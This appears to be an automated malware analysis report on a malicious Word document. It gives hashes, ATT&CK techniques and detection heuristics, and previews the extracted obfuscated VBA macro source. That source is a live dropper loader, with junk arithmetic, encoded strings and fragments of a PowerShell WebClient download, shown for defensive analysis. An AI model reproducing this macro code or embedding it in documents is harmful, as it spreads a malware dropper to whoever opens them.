Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1f775bb2eb41aed…

MALICIOUS

Office (OLE)

Size: 111.5 KB
Created: 2018-02-16 21:00:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 993fd58236440b77f5d43daf7403eca3
SHA-1: 9a48b0c53057a1cb4dddf5cff59edbb6c001abe8
SHA-256: e1f775bb2eb41aed007394ab8fc5f68b878c5017037d28653678279bf347e8b1
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing heavily obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() calls to execute a payload. The ClamAV detection name 'Doc.Dropper.Agent' further suggests its role as a dropper. No specific family could be identified due to the obfuscation.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6450700-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450700-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 33423 bytes
SHA-256: 4aef35ea14d2bfc6e9ca39f3b61b722f5557535e881ade704c37edb6a6dfe4a8

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TunqTAItS"
Function pquJzupaDTsI()
On Error Resume Next
NHQHPkjZ = 1636598 / ChrB(9574479 + CBool(4592213)) / 8534709 * HsiVRjzGaI * (bfKwCXiQzVJiu / mvjHQU / 7237756 - CByte(7763763) / 4353702 - LIzPrPpNfZtCtI)
mzDAYz = 6836373 / ChrB(7108267 + CBool(3019220)) / 1324748 * GzJkMfkOwJoHn * (NluZSZ / fwCUPkCaYjE / 5913015 - CByte(9044098) / 3152209 - BXkkGBrDrSGtjX)
UWaPotuuzkH = 7874923 / ChrB(2116384 + CBool(9391892)) / 6404282 * aBGQzu * (nadjcssNjXp / TiosLBJrVDj / 4038903 - CByte(1489090) / 9508733 - pwuGnpXNQZHp)
sjVBP = (NwnoSUhEFm) + ?HIUbhhuGKUsad("AKRfTKaHiiftUTzqt3nt;yL3+yL3Hm3NSyL3+yL3B5EH+5EH =yL3uwN+uwN+yL3 HmuwN+uwNyL3+yL33n5EH+5EHsyjPrSqzsPMvzmi", 18, 75)
MNIjDd = 6002550 / ChrB(1296283 + CBool(558438)) / 2861397 * QBsvVXTELvqD * (RztjKCpz / wnKdZRfKHzDwB / 3841023 - CByte(4083684) / 3600342 - OpqDtL)
WvrdHmRn = 1873067 / ChrB(3880740 + CBool(4857600)) / 1822040 * vwzYpYDFkrz * (YBotz / QfYQEoAI / 7831678 - CByte(976383) / 5254876 - JAHwO)
lldMmczZW = 2114789 / ChrB(9596343 + CBool(5955585)) / 1866662 * QPhORnRBFS * (DIiKfrL / jjwijhztc / 7409567 - CByte(5608715) / 9071953 - HnOIiqXM)
QfaAT = (mIvOoCMjqIc) + ?HIUbhhuGKUsad("ucOJqziEUstem.Net.WeyL'+'3+yL3bCliyL3+yL3eyL3'+'+yLsivOwLcuvAiNhURN", 10, 42)
rUIPPb = 3034483 / ChrB(247847 + CBool(9396776)) / 128741 * LpzwVtbFQqDJ * (NduwXk / DSBXXl / 81403 - CByte(2013526) / 4227226 - lmTzunw)
BuicbSzmqMz = 3784440 / ChrB(2929889 + CBool(921169)) / 1025682 * dzMSOcS * (TdMqlsoZak / QjCEQqLSpwcIf / 853217 - CByte(8042682) / 7956149 - LEWYs)
HZdORmzoIi = 8983264 / ChrB(8897813 + CBool(1473190)) / 4991122 * LBzWsiLoda * (vcCJcdqUjmvDm / VOUYpIz / 8278057 - CByte(2661918) / 50688 - qbjiTQMO)
kJOYUXNU = (SlwjTtpPcXqvV) + ?HIUbhhuGKUsad("IBwGDhpkQmKAIXEMTyL3yL3) ((yL3Hm3nsadasyL35EH+5EH+yL3d yL3+yL3=yL5hRLw", 18, 49)
WsjTTaaMd = 4403309 / ChrB(3122242 + CBool(8295093)) / 3068833 * SzEOCslBGqMW * (ofwtuFIXEKz / kSdTMNcAX / 9301388 - CByte(1819801) / 2303238 - SWiQwwj)
bscFRZzQLwp = 3723652 / ChrB(6284704 + CBool(1834349)) / 6423668 * dWlHQN * (GqSZIhtckWLs / mjcjdHIOR / 895450 - CByte(669482) / 1747895 - KjrrsHjWFWzwVi)
plKLZp = 506088 / ChrB(3722917 + CBool(9257588)) / 9413110 * RLWwuBdJE * (omOQNXKls / EJzjJcmIZF / 9027956 - CByte(4089241) / 1482339 - sknmzpOwizQ)
jwwVuMoQ = (mtpQwNH) + ?HIUbhhuGKUsad("uzWoaDofU'+'98+[chAR]70+[chAR]86),5EH5hY5EH).REplACE(([cuwN+uwNhAR]HzRKpdFbTijLhWZaOaMoKsN", 10, 58)
mCzhaH = 7600817 / ChrB(569038 + CBool(3031583)) / 1189654 * CQZqGzNNMRo * (kZzzfasO / TzFFHfbVuA / 586698 - CByte(2026116) / 5406002 - ZNbIVV)
IVOtYlarv = 7308868 / ChrB(3303519 + CBool(338794)) / 7990495 * nDlXIcW * (AiSTlwUmsRRlH / PXlDRX / 8566380 - CByte(8602027) / 514523 - QqTcpzmYjSbaHu)
BVADGoi = 8153572 / ChrB(1979804 + CBool(324987)) / 6827414 * zkDHfnOlEKzzH * (XCuirwuftFo / oQrNHVJwDLM / 6820690 - CByte(7727368) / 7881031 - LiNjTTvjrw)
RIaqKzSLnmJ = (SPVjzdTijYcjX) + ?HIUbhhuGKUsad("KkilL3+yL3adyL3+yL3ayL3+yL3sd'+'.yL3+yL3neyL3+yL3xyL3+uwN+uwNyL3t(10000, 282133);yL3+'+'yL3HyL3+yL3m3ADyL3+yL3CX = uyL3+yL3MA htyL3+yL3dhXSRooZzilckq", 5, 131)
jEdUi = 6069918 / ChrB(4928492 + CBool(4021932)) / 2607460 * hzRbLWzjUOQpq * (RqKBdKTXBl / HRPXLYwlEQvZ / 5167757 - CByte(3709118) / 3843516 - tsbuAM)
zSVhaflTco = 8413575 / ChrB(3486423 + CBool(1184114)) / 3984043 * rDaJzjmDE * (MIqSElMVRji / BZiaqo / 9132953 - CByte(4942084) / 9559910 - qAGhiGzt)
kspXsJ = 7671834 / ChrB(3002691 + CBool(2924455)) / 4801185 * jkcwaiwpkpi * (AfXpw / fmvRqM / 4348091 - CByte(1446871) / 1202670 - XwSuctupO)
jNptk = (CiqJcMqKqCVjz) + ?HIUbhhuGKUsad("vzrE(([ChAR]117+[ChAR]119jGzOichPvd", 4, 22)
pmJjYju = 4717647 / ChrB(4606296 + CBool(3391746)) / 7819628 * oZHkhaHnk * (TLfnqiiwTHLJ / HcvwRCWdKRnjG / 4184855 - CByte(8277865) / 8582025 - hUzBSGObjo)
pCAUwaK = 8798826 / C
... (truncated)